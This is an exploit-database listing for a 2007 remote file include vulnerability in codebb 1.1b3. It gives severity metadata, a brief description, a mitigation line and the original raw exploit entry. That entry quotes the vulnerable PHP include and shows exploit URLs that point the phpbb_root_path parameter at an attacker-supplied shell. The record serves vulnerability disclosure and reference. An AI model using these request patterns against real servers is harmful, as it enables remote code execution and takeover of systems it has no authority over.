header-logo
Suggest Exploit
vendor:
codebb
by:
Alkomandoz Hacker
5.5
CVSS
MEDIUM
Remote File Include
22
CWE
Product Name: codebb
Affected Version From: 1.1b3
Affected Version To: 1.1b3
Patch Exists: NO
Related CWE:
CPE: a:codebb:codebb:1.1b3
Metasploit:
Other Scripts:
Platforms Tested:
2007

codebb 1.1b3 (phpbb_root_path) Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file by manipulating the 'phpbb_root_path' parameter in the 'pass_code.php' and 'lang_select' files of codebb 1.1b3.

Mitigation:

Update to a version that is not vulnerable or apply patches if available.
Source

Exploit-DB raw data:

# codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2

# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net
# V.Code

# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);

require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);



# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL

    [Path]/codebb/lang_select?phpbb_root_path=SheLL


# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa

# Thanx: asb-may.net & TrYaG.CoM

# milw0rm.com [2007-03-28]

Navigation

Suggest Exploit

Services By CQR